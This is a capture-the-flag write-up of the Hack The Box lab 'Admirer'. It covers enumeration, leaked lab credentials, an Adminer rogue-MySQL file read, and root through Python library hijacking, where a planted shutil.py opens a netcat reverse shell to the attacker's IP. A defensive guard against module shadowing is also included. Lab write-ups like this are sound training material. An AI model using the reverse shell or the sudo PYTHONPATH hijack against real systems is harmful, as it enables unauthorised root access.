
Hack The Box Writeup: Admirer

This is my first box again after being away from Hack The Box for a while. Admirer focuses on Adminer, the predecessor of the immensely popular phpMyAdmin. The version in question has a vulnerability that I used for the user flag. Root was achieved by abusing an import in a Python backup script.

Hack The Box Admirer

[0x1] Reconnaissance & Enumeration

Step 1 is, as usual, a port scan with Nmap. The parameters below enable the default scripts (-sC), version detection (-sV), all ports (-p-), and output to a file (-oA).

nmap -sC -sV -p- -T5 -oA admirer-allports admirer
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-05 13:06 BST
Warning: 10.10.10.187 giving up on port because retransmission cap hit (2).
Nmap scan report for admirer (10.10.10.187)
Host is up (0.014s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
1572/tcp filtered chip-lm
2514/tcp filtered facsys-ntp
11837/tcp filtered unknown
24771/tcp filtered unknown
32876/tcp filtered unknown
37243/tcp filtered unknown
58667/tcp filtered unknown
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 419.39 seconds

The scan shows a number of ports. After some checks, port 80 is the most interesting for now. The website does not show much relevant information at first glance.

Hack The Box Admirer website

After browsing the website for a while, I launched DirBuster. Having done a few boxes where the interesting file is not what you expect right away, I also had DirBuster search for text files and not just PHP files. In this case, DirBuster finds two text files.

dirbuster 

File found: /admin-dir/contacts.txt - 200
File found: /admin-dir/credentials.txt - 200
DirBuster Stopped

[0x2] Initial Foothold

I fetch the file with curl and read the output. According to the file, p.wise@admirer.htb is one of the admins.

curl http://admirer/admin-dir/contacts.txt
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb

##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb

#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

The second file provides login credentials for mail, FTP and WordPress.

curl http://admirer/admin-dir/credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

With the FTP credentials, I log in to the FTP server on Admirer; in the port scan, FTP was also visible as an open service. There is not much to be found besides a MySQL dump file and a website backup.

ftp admirer
Connected to admirer.
220 (vsFTPd 3.0.3)

Name (admirer:user): ftpuser
331 Please specify the password.
Password:

230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.

-rw-r--r-- 1 0 0 3405 Dec 02 2019 dump.sql
-rw-r--r-- 1 0 0 5270987 Dec 03 2019 html.tar.gz
226 Directory send OK.

I download both files for further research on my Parrot machine. While looking through the contents of the website backup, I find a robots.txt file with an explicit disallow for a secret folder of Waldo's, namely w4ld0s_s3cr3t_d1r.

sudo cat robots.txt
User-agent: *

# This folder contains personal stuff, so no one (not even robots!) should see it - waldo
Disallow: /w4ld0s_s3cr3t_d1r

The website backup contains this folder from robots.txt, so I can view it. However, the contacts file brings nothing new.

cat w4ld0s_s3cr3t_d1r/contacts.txt
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb

#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

The credentials file in this folder additionally contains credentials for a bank account. They might come in handy later, but for now I don't expect much from them.

cat w4ld0s_s3cr3t_d1r/credentials.txt
[Bank Account]
waldo.11
Ezy]m27}OREc$

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

The contents of db_admin.php look more promising: a database connection string with a username and password. Let's write those down, they might come in handy.

cat db_admin.php
<?php
  $servername = "localhost";
  $username = "waldo";
  $password = "Wh3r3_1s_w4ld0?";

  // Create connection
  $conn = new mysqli($servername, $username, $password);

  // Check connection
  if ($conn->connect_error) {
      die("Connection failed: " . $conn->connect_error);
  }
  echo "Connected successfully";


  // TODO: Finish implementing this or find a better open source alternative
?>

After searching a bit further in the backup I also come across a folder called utility-scripts. Because it is a backup of the website, the folder might also exist on the live website. The path cannot be browsed directly, but experience teaches that sometimes you have to search for something you think you cannot reach. In this case, I fuzz for PHP files directly in utility-scripts using Wfuzz with big.txt as a wordlist.

Three hits can be reached directly at the full URL (HTTP 200).

wfuzz -c -w /usr/share/wordlists/dirb/big.txt -z list,php --hc 403,404 -t 100 -u http://admirer/utility-scripts/FUZZ.FUZ2Z


Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://admirer/utility-scripts/FUZZ.FUZ2Z
Total requests: 20469

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000001873: 200 51 L 235 W 4157 Ch "adminer - php"
000009618: 200 964 L 4976 W 83990 Ch "info - php"
000013866: 200 0 L 8 W 32 Ch "phptest - php"

Total time: 38.03754
Processed Requests: 20469
Filtered Requests: 20466
Requests/sec.: 538.1261


[0x3] Path to User flag

The page adminer.php provides an Adminer portal with a login for a database. Given the credentials I found in the connection string, I try to log in with Waldo's account. Unfortunately this doesn't work. After searching on Google I come across a blog post about a vulnerability in Adminer: by logging in through the portal to a MySQL server you control yourself and importing a local file from the web server, for example /etc/passwd, the contents of that file end up in your own database.

So I installed my own MySQL (MariaDB) server on my machine and created an empty database (LocalAdmirer) with a table temp.

MariaDB [(none)]> CREATE DATABASE LocalAdmirer;
MariaDB [(none)]> CREATE USER 'admin'@'%' IDENTIFIED BY 'admirer4dm1n';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON * . * TO 'admin'@'%';
MariaDB [(none)]> FLUSH PRIVILEGES;
MariaDB [(none)]> USE LocalAdmirer
MariaDB [(LocalAdmirer)]> CREATE TABLE temp(data VARCHAR(255));

From /utility-scripts/adminer.php on the box I connect to my own machine and select the created table temp in the database.

Hack The Box Admirer login Adminer
Hack The Box Admirer LocalAdminer

The query I run imports the local file index.php into my table temp. The '../' is needed to go up one level from the utility-scripts directory to the webroot.

Hack The Box Admirer sql query

After the successful import, I see a new connection string with a different password for Waldo.

Hack The Box Admirer import

One of the open ports from the scan is SSH. A great place to try Waldo's account with the new password: &<h5b~yK3F#{PaPB&dA}{H>

The account with the corresponding password is usable and I am logged in as Waldo.

ssh waldo@admirer
[sudo] password for user:
The authenticity of host 'admirer (10.10.10.187)' can't be established.

ECDSA key fingerprint is SHA256:NSIaytJ0GOq4AaLY0wPFdPsnuw/wBUt2SvaCdiFM8xI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added 'admirer,10.10.10.187' (ECDSA) to the list of known hosts. 
waldo@admirer's password:

Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software; the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Wed Apr 29 10:56:59 2020 from 10.10.14.3

Just a quick check to see if the user flag is present in Waldo’s account.

ls
user.txt
waldo@admirer:~$ ls -sla
total 28
4 drwxr-x--- 3 waldo waldo 4096 Apr 29 11:18 .
4 drwxr-xr-x 9 root root 4096 Dec 2 2019 ..
0 lrwxrwxrwx 1 waldo waldo 9 Nov 29 2019 .bash_history -> /dev/null
4 -rw-r--r-- 1 waldo waldo 220 Nov 29 2019 .bash_logout
4 -rw-r--r-- 1 waldo waldo 3526 Nov 29 2019 .bashrc
0 lrwxrwxrwx 1 waldo waldo 9 Dec 2 2019 .lesshst -> /dev/null
0 lrwxrwxrwx 1 waldo waldo 9 Nov 29 2019 .mysql_history -> /dev/null 
4 drwxr-xr-x 2 waldo waldo 4096 Apr 29 10:57 .nano
4 -rw-r--r-- 1 waldo waldo 675 Nov 29 2019 .profile
4 -rw-r----- 1 root waldo 33 Jul 12 08:14 user.txt

Yep, that's the user flag. Now let's enumerate this box some more to find the root flag.

cat user.txt
d570cb4117b3eee9e6ae9f51fb1bcb7c

[0x4] Path to Root flag

While looking around on the machine I again come across the script admin_tasks.sh that I had seen earlier. On the website not all functions were available, but when I start the script now, all functions are offered. I try to see whether option 6 works and lets me write out the shadow file; maybe the root password can be recovered from it.

./admin_tasks.sh
[[[ System Administration Menu ]]] 
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit

Unfortunately, the script may well work, but I'm not allowed to read the output.

cat /var/www/shadow.bak
Sorry, user waldo is not allowed to execute '/bin/cat /var/www/shadow.bak' as root on admirer.htb.

Making changes to the script is not allowed either.

nano admin_tasks.sh
Sorry, user waldo is not allowed to execute '/bin/nano admin_tasks.sh' as root on admirer.htb.

The directory that contains the script also contains a script called backup.py. This script is vulnerable to Python library hijacking: it imports shutil by name only, so if the PYTHONPATH variable points to another location, a shutil.py in that location is found before the standard library one and runs with the permissions of the script (probably root).

waldo@admirer:/opt/scripts$ cat backup.py
#!/usr/bin/python3
from shutil import make_archive
src = '/var/www/html/'
# old ftp directory, not used anymore
#dst = '/srv/ftp/html'
dst = '/var/backups/html'
make_archive(dst, 'gztar', src)
https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

Listing the module search path shows the order in which Python looks for shutil:

python3 -c 'import sys; print("\n".join(sys.path))'

/usr/lib/python35.zip
/usr/lib/python3.5
/usr/lib/python3.5/plat-x86_64-linux-gnu
/usr/lib/python3.5/lib-dynload
/usr/local/lib/python3.5/dist-packages
/usr/lib/python3/dist-packages
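To make the import-resolution mechanics above concrete from the defender's side, here is an added example (my own code, not part of the original writeup or of the box) that resolves where a stdlib module such as shutil would be loaded from without importing it, and refuses to trust it when the resolved file lies outside the interpreter's standard-library directories. The names resolve_module_origin(), is_trusted_origin(), stdlib_module_is_safe() and TRUSTED_DIRS are assumptions made for this example; the shadowing demo writes a harmless stand-in module into a temporary directory and emulates what PYTHONPATH does by prepending that directory to the search path.

```python
#!/usr/bin/env python3
"""Check where a Python import would actually resolve from before trusting it.

Added educational example, not code from the original writeup. It shows how an
entry placed early in the module search path (which is what PYTHONPATH does)
shadows the standard-library shutil, and a guard a privileged script could run
to stop when a stdlib module resolves from an unexpected directory.
"""
import importlib.machinery
import os
import sys
import sysconfig
import tempfile

# Directories from which standard-library modules are expected to load
# (assumption: the interpreter's sysconfig stdlib paths are the trust anchor).
TRUSTED_DIRS = tuple(
    os.path.realpath(p)
    for p in {sysconfig.get_paths()["stdlib"], sysconfig.get_paths()["platstdlib"]}
)


def resolve_module_origin(name, search_path=None):
    """Return the file a module would be loaded from, without importing it.

    search_path defaults to sys.path, the list PYTHONPATH entries are prepended to.
    """
    spec = importlib.machinery.PathFinder.find_spec(name, search_path)
    if spec is None or not spec.origin:
        return None
    return os.path.realpath(spec.origin)


def is_trusted_origin(origin, trusted_dirs=TRUSTED_DIRS):
    """True only if the resolved file sits inside one of the trusted stdlib dirs."""
    if origin is None:
        return False
    return any(origin == d or origin.startswith(d + os.sep) for d in trusted_dirs)


def stdlib_module_is_safe(name, search_path=None):
    """Guard a privileged script would call before importing a stdlib module."""
    return is_trusted_origin(resolve_module_origin(name, search_path))


def demonstrate_shadowing():
    """Show the hijack mechanics with a harmless stand-in module.

    Returns (origin_with_clean_path, origin_with_shadowed_path). The shadowed
    origin is the temporary file, not the real shutil.
    """
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-in: same function name as the real module, no side effects.
        with open(os.path.join(tmp, "shutil.py"), "w") as fh:
            fh.write("def make_archive(*args, **kwargs):\n    return 'shadowed'\n")
        clean = resolve_module_origin("shutil")
        # PYTHONPATH entries land ahead of the stdlib, so emulate that ordering.
        shadowed = resolve_module_origin("shutil", [tmp] + sys.path)
        return clean, shadowed


if __name__ == "__main__":
    clean, shadowed = demonstrate_shadowing()
    print("clean search path   ->", clean, "| trusted:", is_trusted_origin(clean))
    print("shadowed search path ->", shadowed, "| trusted:", is_trusted_origin(shadowed))
```

The check only matters if the privileged script reaches it with a clean environment: sudo's default env_reset strips PYTHONPATH unless the rule carries the SETENV tag or env_keep lists the variable, and running the interpreter with python3 -I (isolated mode) ignores PYTHONPATH and the script directory entirely. Both are cheaper fixes than this guard, which is here to make the search-path behaviour visible.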

I create a temporary folder called templib and create a new shutil.py in it, containing a reverse shell back to my machine. This should work if it is executed with the proper permissions.

cd ~
mkdir templib
nano ~/templib/shutil.py

import os

# Same function name as shutil.make_archive, so backup.py calls it unchanged
def make_archive(a, s, d):
    os.system("nc 10.10.14.64 1337 -e /bin/sh")

On my own machine, I start a Netcat handler on port 1337 (because of hacker).

rlwrap netcat -lvnp 1337
listening on [any] 1337 ...

By setting the PYTHONPATH variable to ~/templib/ and running the admin_tasks.sh script through sudo, the new location for shutil.py is used and the reverse shell starts.

sudo PYTHONPATH=~/templib/ /opt/scripts/admin_tasks.sh

[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option: 6
Running backup script in the background, it might take a while... 
waldo@admirer:~/templib$

And there it is, the incoming connection by running the reverse shell.

rlwrap netcat -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.187] 60916

Just to be sure, I try to get a more interactive shell.

python -c 'import os; os.system("/bin/sh")'

And it worked! The custom script in which I placed the reverse shell is executed as root, as whoami shows. Now it's just a matter of grabbing the root flag.

whoami
root

id
uid=0(root) gid=0(root) groups=0(root) 
hostname
admirer

As always it is neatly placed in /root/Desktop and thus Admirer is officially rooted!

cat root.txt
4d0c9330fa5e92886ab3f11b3e10ac4d


All information in this post is for educational use only! Do not use it on others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!



d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?